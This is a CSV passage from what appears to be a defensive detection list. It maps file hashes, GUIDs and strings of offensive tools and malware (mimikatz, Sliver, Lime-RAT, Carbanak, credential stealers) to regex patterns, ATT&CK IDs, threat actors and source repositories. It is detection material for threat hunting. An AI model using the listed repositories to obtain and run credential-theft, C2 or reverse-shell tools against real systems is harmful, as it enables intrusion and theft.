"*73e0810037eaca1b0a643396b61a0b6462582d89d952c0c20f96f800dbf5e2e5*",".{0,1000}73e0810037eaca1b0a643396b61a0b6462582d89d952c0c20f96f800dbf5e2e5.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29003"
"*73ECE052-4218-465D-AA2E-A2D03448BEDD*",".{0,1000}73ECE052\-4218\-465D\-AA2E\-A2D03448BEDD.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29006"
"*73EF1630-1208-43C5-9E3F-19A2923875C5*",".{0,1000}73EF1630\-1208\-43C5\-9E3F\-19A2923875C5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29007"
"*73F11EE8-F565-479E-8366-BD74EE467CE8*",".{0,1000}73F11EE8\-F565\-479E\-8366\-BD74EE467CE8.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","29008"
"*73fb2d477ece754ce6ad9239126b69f9dc3dfc95775ef0714a4df26ee7ac4352*",".{0,1000}73fb2d477ece754ce6ad9239126b69f9dc3dfc95775ef0714a4df26ee7ac4352.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","29011"
"*73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435*",".{0,1000}73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","29012"
"*7405ebb59402ba05f601ba5533c31149d406a16e9b0159b7ab347f16c0400ff9*",".{0,1000}7405ebb59402ba05f601ba5533c31149d406a16e9b0159b7ab347f16c0400ff9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29014"
"*740879d5c5c757899862884c89b2d1386ff5b85a68d8d847201080f74201ed36*",".{0,1000}740879d5c5c757899862884c89b2d1386ff5b85a68d8d847201080f74201ed36.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","29015"
"*7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f*",".{0,1000}7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29016"
"*7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f*",".{0,1000}7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29017"
"*740eeb1510b4ed4b7f45792e1fed2296c31f026ccbd07ac4c081ebf019bed957*",".{0,1000}740eeb1510b4ed4b7f45792e1fed2296c31f026ccbd07ac4c081ebf019bed957.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29019"
"*7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9*",".{0,1000}7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29021"
"*7419174a31b2ec7503765d473943459f5d3d959c0c69fa23da6f6f551e6464ce*",".{0,1000}7419174a31b2ec7503765d473943459f5d3d959c0c69fa23da6f6f551e6464ce.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","29022"
"*74200b1f738a038ff90ec70377feb61c978487c71b2a9468d827c188fc33a900*",".{0,1000}74200b1f738a038ff90ec70377feb61c978487c71b2a9468d827c188fc33a900.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29023"
"*7423162b1a3b77b3cb5f76173204dd5983b683ae*",".{0,1000}7423162b1a3b77b3cb5f76173204dd5983b683ae.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","29024"
"*74320041c8717c6859e9b2c03b5c187b7157bb0c36a0f883192621e3a5f49711*",".{0,1000}74320041c8717c6859e9b2c03b5c187b7157bb0c36a0f883192621e3a5f49711.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29025"
"*743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe*",".{0,1000}743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29026"
"*743772d28582dd1c9e4015074bac13a00232b41d9de7fb8358858825024da9cc*",".{0,1000}743772d28582dd1c9e4015074bac13a00232b41d9de7fb8358858825024da9cc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29028"
"*7442b80cbef6b940d332c3ee1f640c8b7c61fbd833895da3b58c72f5e802765f*",".{0,1000}7442b80cbef6b940d332c3ee1f640c8b7c61fbd833895da3b58c72f5e802765f.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29032"
"*7443/new/payloads*",".{0,1000}7443\/new\/payloads.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","29033"
"*744e50af5566fa5ab70d4db70d35b3b89d75018e00b6b1e8e6280030482353bc*",".{0,1000}744e50af5566fa5ab70d4db70d35b3b89d75018e00b6b1e8e6280030482353bc.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29036"
"*74538a33411912829115fdbd71633c7e250b00fb2c1a936641c3d32c3e77ee8b*",".{0,1000}74538a33411912829115fdbd71633c7e250b00fb2c1a936641c3d32c3e77ee8b.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29037"
"*7454351714f775b8391bc42fb94e929c87850debadc69d48a40ac7d9584e1211*",".{0,1000}7454351714f775b8391bc42fb94e929c87850debadc69d48a40ac7d9584e1211.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","29038"
"*745a1708e179bd41883666ac0c5c35c615f1dd2a730ff0c1761beb5fc7ed7248*",".{0,1000}745a1708e179bd41883666ac0c5c35c615f1dd2a730ff0c1761beb5fc7ed7248.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29041"
"*745bdc69fd7d712f65419c126b3ab5524fb96a511a21fea2d2b261607b3b2c55*",".{0,1000}745bdc69fd7d712f65419c126b3ab5524fb96a511a21fea2d2b261607b3b2c55.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29042"
"*745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18*",".{0,1000}745d105a0ce33f13d32c65e383e0c8a3e2446b5d279008fe1665737bbc8a6b18.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29043"
"*7460daaecb43751385fc4ec001ac2496d9d8041ccafbef3793262644f500baf6*",".{0,1000}7460daaecb43751385fc4ec001ac2496d9d8041ccafbef3793262644f500baf6.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","29044"
"*746726f4bb20bc303db072b0496a69e91b409285bad1c5507d1969ef19d27380*",".{0,1000}746726f4bb20bc303db072b0496a69e91b409285bad1c5507d1969ef19d27380.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","29045"
"*746c0a01b163c57f729738cfe39c1c83d0b938aa48f07d1f866c1b8adaec4aa0*",".{0,1000}746c0a01b163c57f729738cfe39c1c83d0b938aa48f07d1f866c1b8adaec4aa0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29046"
"*74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6*",".{0,1000}74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","29047"
"*7484009227:AAEvngzrIKFNFdfSqECzWAqbnB5IXk8pjVo*",".{0,1000}7484009227\:AAEvngzrIKFNFdfSqECzWAqbnB5IXk8pjVo.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","29048"
"*7498456870aa9d28a3ec5fd9bab4838bd4a0a35c2f41ac8da9116326337f8b7e*",".{0,1000}7498456870aa9d28a3ec5fd9bab4838bd4a0a35c2f41ac8da9116326337f8b7e.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","29052"
"*74a30d4ca766db4424a21073abf73dff319832d6af8db37a0ec45edae12d897d*",".{0,1000}74a30d4ca766db4424a21073abf73dff319832d6af8db37a0ec45edae12d897d.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","29053"
"*74a529e953952d9830fee9a63ae5489f59ad85f22bdf07e5d3d184d07f970cfb*",".{0,1000}74a529e953952d9830fee9a63ae5489f59ad85f22bdf07e5d3d184d07f970cfb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29056"
"*74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1*",".{0,1000}74ae919aa5d393c04fd5b2a8048b8df764e871f1e652099d50c5ea63fb06a2e1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","29057"
"*74afc28bb4191086a08bf270410650a7eb9f0401192e2ae7a36cf3b6b0e992df*",".{0,1000}74afc28bb4191086a08bf270410650a7eb9f0401192e2ae7a36cf3b6b0e992df.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","29058"
"*74b2d869745f1f642e34d8f694da33eaddfb7c6e68ad9cf24bc40df90db834cb*",".{0,1000}74b2d869745f1f642e34d8f694da33eaddfb7c6e68ad9cf24bc40df90db834cb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29059"
"*74b7b34bd0a221eaaf383ef8a38f41f466166c6184d6586f510cf509e9e52f0d*",".{0,1000}74b7b34bd0a221eaaf383ef8a38f41f466166c6184d6586f510cf509e9e52f0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29061"
"*74b8858250ad0401708fc5f45650d57ce5fef0a6ab9d190ad384997e3bb794fd*",".{0,1000}74b8858250ad0401708fc5f45650d57ce5fef0a6ab9d190ad384997e3bb794fd.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","29062"
"*74bc640c2f33875dab29328c3f49dce2658a4b77a38612f11a14c4c100ba8cb6*",".{0,1000}74bc640c2f33875dab29328c3f49dce2658a4b77a38612f11a14c4c100ba8cb6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29063"
"*74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625*",".{0,1000}74c46a8cf10e17f507701a84dc429eb7a7a276f0d8e15b4026a3242a1bc0a625.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29064"
"*74c63668a8b03c046dcb1293ccffd2e0f7b4dd22210a4faff3d29a0db5761d20*",".{0,1000}74c63668a8b03c046dcb1293ccffd2e0f7b4dd22210a4faff3d29a0db5761d20.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29066"
"*74cab90c0b8c811550b25a010382685337a64086ff2a7b20fd7b5c29c80c8580*",".{0,1000}74cab90c0b8c811550b25a010382685337a64086ff2a7b20fd7b5c29c80c8580.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29067"
"*74da983c63f4c77eafcd9953c0705f01e2dfcc30a14fded06ff1e2641b8ea856*",".{0,1000}74da983c63f4c77eafcd9953c0705f01e2dfcc30a14fded06ff1e2641b8ea856.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","29071"
